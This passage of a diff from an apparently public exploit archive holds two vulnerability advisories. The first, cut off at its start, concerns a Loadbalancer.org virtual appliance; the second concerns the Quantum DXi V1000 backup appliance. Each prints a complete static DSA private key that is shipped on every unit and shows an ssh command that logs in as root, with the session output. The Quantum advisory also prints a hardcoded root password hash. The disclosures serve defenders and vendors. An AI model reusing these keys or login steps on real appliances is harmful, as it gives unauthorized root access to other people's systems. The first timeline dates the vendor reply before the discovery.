Lockdown Script + +To ensure that the appliance is secure it's recommended that a number of +steps should be carried out. +These steps have been incorporated into a lockdown script which can be run +at the console (recommended) or via a terminal session. +The script helps to lock down the following: +- the password for the 'loadbalancer' Web User Interface account +- the password for the Linux 'root' account +- which subnet / host is permitted access to the load balancer + +It also regenerates the SSH keys that are used to secure communicating +between the master and slave appliance. + +To start the script, at the console or via an SSH terminal session run the +following command: +???lbsecure +--- + + +However, the lbsecure script will regenerate the id_dsa/id_dsa.pub, but the +authorized_keys2 will remain untouched. +This makes it still possible to login using the key, without any password! + +Create a file "lb" containing the key: + +$ cat lb +-----BEGIN DSA PRIVATE KEY----- +MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW +Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd +yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ +rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+ +t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW +cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY +TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1 +MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl +2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH +SzmJVCWFyVuuANR2Bnc= +-----END DSA PRIVATE KEY----- + +SSH to the Loadbalancer.org VM using this key: + +$ ssh -i lb root@192.168.2.21 +Last login: Wed Jan 29 09:12:10 2014 from 192.168.2.72 +-bash: warning: setlocale: LC_CTYPE: cannot change locale (UTF-8) +[root@lbmaster ~]# id +uid=0(root) gid=0(root) +groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) +[root@lbmaster ~]# + + + +----------- +Solution: +----------- + +Upgrade to version 7.5.3 or newer + +-------------- +Timeline: +-------------- + +30-01-2014 - Issues discovered and vendor notified +15-01-2014 - Vendor replies, also made patch available. +17-03-2014 - Public disclosure \ No newline at end of file diff --git a/platforms/unix/remote/32372.txt b/platforms/unix/remote/32372.txt new file mode 100755 index 000000000..f34a9f40f --- /dev/null +++ b/platforms/unix/remote/32372.txt @@ -0,0 +1,95 @@ +----------- +Author: +----------- + +xistence < xistence[at]0x90[.]nl > + +------------------------- +Affected products: +------------------------- + +Quantum DXi V1000 2.2.1 and below + +------------------------- +Affected vendors: +------------------------- + +Quantum +http://quantum.com/ + +------------------------- +Product description: +------------------------- + +Quantum DXi® V-Series is a virtual deduplication backup appliance that +protects physical and +virtual data across remote sites, the datacenter and cloud deployments. + +---------- +Details: +---------- + +[ 0x01 - Default root user ] + +The root user has a hardcoded password that is unknown and not changeable. +Normally access is only through the restricted shells. + +The /etc/shadow file shows the following hash: +root:$1$FGOgdWM7$dac9P0EJgTSX8a4zc4TXJ/:15783:0:99999:7::: + + +[ 0x02 - Known SSH Private Key ] + + +The /root/.ssh/authorized_keys on the appliance contains the following key +(same with every deployment): + +-----BEGIN DSA PRIVATE KEY----- +MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2 +hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t +Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2 ++o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4 +6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5 +PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr +E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK +6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn +k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u +B3Upsx556K/iZPPnJZE= +-----END DSA PRIVATE KEY----- + +Using the key on a remote system to login through SSH will give a root +shell: + +$ ssh -i quantum.key root@192.168.2.117 +Last login: Mon Sep 23 21:27:19 2013 from 192.168.2.71 + +Product Model = DXiV1000 +Hardware Configuration = V1000 +System Version = 2.2.1_MC +Base OS Version = 2.2.1_MC-9499 +Application Version = 2.2.1_MC-50278 +SCM Build Version = Build14 +Kernel Version = 2.6.18-164.15.1.qtm.4 + +[root@DXi000C29FB1EA1 ~]# id +uid=0(root) gid=0(root) +groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),103(adic) + + +----------- +Solution: +----------- + +Upgrade to version 2.3.0.1 or newer + +-------------- +Timeline: +-------------- + +30-09-2013 - Issues discovered and vendor notified +30-09-2013 - Reply from vendor asking for more details +01-10-2013 - Supplied more details how to replicate +19-11-2013 - Asked for status update +19-11-2013 - Reply from vendor that an updated release is due for March 2014 +xx-xx-2014 - Quantum DXi V1000 2.3.0.1 released +17-03-2014 - Public disclosure \ No newline at end of file